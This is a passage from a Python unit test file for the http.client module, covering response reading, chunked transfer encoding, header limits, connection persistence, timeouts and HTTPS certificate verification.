self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
denylist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in denylist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
